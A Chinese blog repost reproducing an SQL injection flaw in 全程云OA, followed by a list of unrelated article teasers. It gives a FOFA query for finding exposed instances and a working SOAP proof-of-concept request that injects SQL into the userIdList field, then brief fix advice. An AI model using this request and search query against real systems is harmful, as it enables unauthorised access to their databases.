全程云OA SQL注入漏洞复现

全程云OA SQL注入漏洞复现

news2024/11/29 4:31:32

0x01 产品简介

全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能，超过100多个子模块。为企业内部提供高效、畅通的信息渠道，同时也能大力推动公司信息系统发展，提高企业的办公自动化程度和综合管理水平，加快企业信息的流通，提高企业市场竞争能力。

0x02 漏洞概述

由于全程云oa办公系统/OA/PM/svc.asmx页面参数过滤不当，导致存在sql注入漏洞，未授权的攻击者可利用该漏洞获取数据库中的敏感信息。

0x03 复现环境

FOFA：body="images/yipeoplehover.png"

0x04 漏洞复现

PoC

POST /OA/PM/svc.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetUsersInfo xmlns="http://tempuri.org/">
      <userIdList>select @@version</userIdList>
    </GetUsersInfo>
  </soap:Body>
</soap:Envelope>

查询数据库版本

0x05 修复建议

使用预编译语句。

对进入数据库的特殊字符进行转义处理。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1256452.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

wangeditor实时预览

wangeditor实时预览

<template><div><div style"width: 45%;float: left;margin-left: 2%"><p>编辑内容</p><div id"editor" style"height: 100%"></div></div><div style"w…

阅读更多...

基于halo框架采用docker-compose快速部署个人博客

基于halo框架采用docker-compose快速部署个人博客

halo快速部署个人博客技术方案 dockerdocker-composenginxmysql halo简介 Halo是一款现代化的开源博客/CMS系统，所有代码开源在GitHub上且处于积极维护状态。它是基于 Java Spring Boot 构建的，易于部署，支持REST API、模板系统、附件系…

阅读更多...

二叉树算法—后继节点

二叉树算法—后继节点

与其明天开始，不如现在行动！ 文章目录 1 后继节点1.1 解题思路1.2 代码实现 💎总结 1 后继节点 1.1 解题思路二叉树节点结构定义如下： public static class Node { public int cal; public Node left; public Node right; public…

阅读更多...

记一次处理大数据而导致的内存溢出问题

记一次处理大数据而导致的内存溢出问题

问题订单服务通过MQ进行订单同步时，刚启动可以正常消费，但是跑一会就会卡住，每次都是第8个kafka分区不行再进行消费，其他分区消费的很慢。现象首先，CPU超高，达到百分之300多；其次&#xf…

阅读更多...

纯新手发布鸿蒙的第一个java应用

纯新手发布鸿蒙的第一个java应用

第一个java开发鸿蒙应用 1.下载和安装华为自己的app开发软件DevEco Studio HUAWEI DevEco Studio和SDK下载和升级 | HarmonyOS开发者 2.打开IDE新建工程（当前用的IDEA 3.1.1 Release） 选择第一个，其他的默认只能用(API9)版本，…

阅读更多...

【教学类-06-09】20231126 X-Y数字分合-分-下空右

【教学类-06-09】20231126 X-Y数字分合-分-下空右

结果展示： 背景需求： 1、加减法理论上在幼儿园不适用（虽然实际上幼儿在家早就练习了） 2、分合题是大班教学数上涉及的内容，可以尝试（类似于减法、加法）可以用雪花片等实物进行增加、减少。——…

阅读更多...

【教学类-06-13】20231126 （55格版）趣味题（一）1-9加法题（10倍）（整十相加）

【教学类-06-13】20231126 （55格版）趣味题（一）1-9加法题（10倍）（整十相加）

作品展示背景需求： 1、会做加法题的孩子5分钟内完成题目，太快了，所以为了拉平差异，需要给这些会做另外的题目，比如提供一些他们没有做过的“趣味题形”。 2、好多次，听见大班孩子在互相“考试”——“老…

阅读更多...

数据结构与算法Java版本单元测验题

数据结构与算法Java版本单元测验题

1.【实验题 2-2】实现以下对单链表的操作，题意和算法描述见《习题解答》图 2-7。 //将单链表 list 逆转，将各结点的 next 指向其前驱。泛型方法，返回值类型前声明类型参数 T public static void reverse(SinglyList list) 【思考题 2-6】实现…

阅读更多...

Horizon地平线财富一直坚持“创新、开放、协作、共享”的运营理念

Horizon地平线财富一直坚持“创新、开放、协作、共享”的运营理念

在“寒风凛冽”的熊市，投资人需要一颗不断探索、勇于尝试的心。勇气意味着即使你知道这条路很难，你仍然选择坚持。而信念则是相信，即使现在很多人不理解、甚至嘲笑，未来总会有一天他们会明白。 Horizon一直坚持着“创新、开放、…

阅读更多...

4 时间序列预测入门： LSTM+ATTENTION

4 时间序列预测入门： LSTM+ATTENTION

0 前沿注意力机制其本质是一种通过网络自主学习出的一组权重系数，并以“动态加权”的方式来强调我们所感兴趣的区域同时抑制不相关背景区域的机制。核心目标也是从众多信息中选择出对当前任务目标更关键的信息。 Multi-Head Attention（MHA）&…

阅读更多...

一网打尽异步神器CompletableFuture

一网打尽异步神器CompletableFuture

Future接口以及它的局限性我们都知道，Java中创建线程的方式主要有两种方式，继承Thread或者实现Runnable接口。但是这两种都是有一个共同的缺点，那就是都无法获取到线程执行的结果，也就是没有返回值。于是在JDK1.5 以后为了解决这…

阅读更多...

C# WPF上位机开发（掌握一点c#基础）

C# WPF上位机开发（掌握一点c#基础）

【声明：版权所有，欢迎转载，请勿用于商业用途。联系信箱：feixiaoxing 163.com】 wpf虽然比较简单，但是最好还是要有一点c#的基础比较好。本身wpf有点类似于web开发，前端和html差不多，后端则和j…

阅读更多...

2024年第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛正式卷任务书

2024年第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛正式卷任务书

2024年第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛正式卷任务书 2024年第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛正式卷A模块基础设施设置/安全加固（200分）A-1：登录安全加固（Windows, Linux&am…

阅读更多...

【推荐系统】MMOE笔记 20231126

【推荐系统】MMOE笔记 20231126

paper阅读任务差异带来的固有冲突实际上会损害至少某些任务的预测，特别是当模型参数在所有任务之间广泛共享时。（在说ESMM） 共享底层参数可以减少过拟合风险，但是会遇到任务差异引起的优化冲突，因为所有任务都需要在…

阅读更多...

CRC 循环冗余检测

CRC 循环冗余检测

目录一、基础知识1.异或运算xor2.模2算术（1）模2加法和减法（2）模2乘法（3）模2除法二、CRC循环冗余检测1.背景2.原理3.求R 一、基础知识 1.异或运算xor 异或，顾名思义，只有当两个数…

阅读更多...

React 入门使用 (官方文档向 Part2)

React 入门使用 (官方文档向 Part2)

文章目录用 State 响应输入声明式地考虑 UI步骤 1：定位组件中不同的视图状态步骤 2：确定是什么触发了这些状态的改变步骤 3：通过 useState 表示内存中的 state步骤 4：删除任何不必要的 state 变量步骤 5：连接事件处理…

阅读更多...

(二) Windows 下 Sublime Text 3 安装离线插件 Anaconda

(二) Windows 下 Sublime Text 3 安装离线插件 Anaconda

1 下载 Sublime Text 3 免安装版 Download - Sublime Text 2 下载 Package Control，放到 Sublime Text Build 3211\Data\Installed Packages 目录下。 Installation - Package Control 3 页面搜索 anaconda anaconda - Search - Package Control Anaconda - Pac…

阅读更多...

使用 Java 客户端通过 HTTPS 连接到 Easysearch

使用 Java 客户端通过 HTTPS 连接到 Easysearch

Easysearch 一直致力于提高易用性，这也是我们的核心宗旨，然而之前一直没有官方的 Java 客户端，也对用户使用造成了一些困扰，现在，我们正式发布了第一个 Java 客户端 Easysearch-client:1.0.1。这一里程碑式的更新为开…

阅读更多...

C语言--利用选择法对数组中的10个整数按由小到大排序

C语言--利用选择法对数组中的10个整数按由小到大排序

一.选择法排序介绍🍗 所谓选择法就是先将10个数中最小的数字与arr[0]交换，再将arr[1]-arr[9]中最小的数字与arr[1]进行交换....每一次比较，找出一个未经排序的数中最小的一个。总共比较9轮。下面以5个数字为例说明选择法的步骤。二.完整代码…

阅读更多...

【高级网络程序设计】Week3-2 Servlet

【高级网络程序设计】Week3-2 Servlet

一、 What are servlets? 1. 定义 （1）Servlets are Java’s answer to CGI： programs that run on a web server acting as middle layer between HTTP request and databases or other applications.Used for client requests that cann…

阅读更多...

推荐文章

最新文章